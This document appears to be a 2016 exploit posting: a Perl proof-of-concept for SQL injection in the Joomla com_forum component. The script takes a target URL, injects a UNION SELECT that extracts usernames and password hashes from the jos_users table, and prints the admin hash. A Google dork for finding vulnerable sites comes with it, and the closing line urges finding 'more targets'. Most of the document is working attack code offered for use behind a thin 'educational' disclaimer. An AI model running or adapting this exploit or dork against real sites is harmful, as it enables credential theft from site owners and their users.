###
# Title : Joomla com_forum Remote SQL Injection Exploit
# Author : Dz MinD Injector
# Home : Algeria 23000 d^_^b
# FaCeb0ok : https://www.facebook.com/Dz.MinD.Injector
# Type : proof of concept
# Tested on : Windows7 & Linux
# Date : 21/01/2016
###
########################################################
# #
# $dzmind="Alla Happy birthay Frére Allah yahfdek"; #
# print $dzmind #
########################################################
######## [ Proof / Exploit ] ################|=>
#! Google Dork :
#+ inrul:com_forum
#########################PrOof Of ConCept ##################################
#!/usr/bin/perl -w
########################################
#[~] Author : Dz MinD Injector
#[!] exploit Name: Joomla com_forum
#[+]Warning: I am not responsible for any damage you might cause!
#[+]Exploit written for educational purposes only.
########################################
print
"\t\t \n\n"
;
print
"\t\t [~] Author : Dz MinD Injector \n\n"
;
print
"\t\t \n\n"
;
print
"\t\t \n\n"
;
print
"\t\t [+]Warning: I am not responsible for any damage you might cause! \n\n"
;
print
"\t\t \n\n"
;
print
"\t\t \n\n"
;
print
"\t\t [!] exploit Name: com_forum Remote SQL Injection \n\n"
;
use
LWP::UserAgent;
chomp
(
my
$target
=<STDIN>);
$dzmind
=
"concat(username,0x3a,password)"
;
$sakkure
=
"jos_users"
;
$com
=
"com_forum"
;
$cw
=
"+UNION+SELECT+"
;
$b
= LWP::UserAgent->new() or
die
"Could not initialize browser\n"
;
$b
->agent(
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'
);
$host
=
$target
.
"/index.php?option="
.
$com
.
"&Itemid=29&func=view&ind=317&catid=4"
.
$cw
.
"1,"
.
$dzmind
.
",3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from/**/"
.
$sakkure
.
"+--+"
;
$res
=
$b
->request(HTTP::Request->new(GET=>
$host
));
$answer
=
$res
->content;
if
(
$answer
=~/([0-9a-fA-F]{32})/){
print
"\n[+] Admin Hash : $1\n\n"
;
print
"# Successfully Injected #\n\n"
;
}
else
{
print
"\n[-] Exploit Failed :( \n"
;
##Demo's :
!+ Find More targets in Google ^_^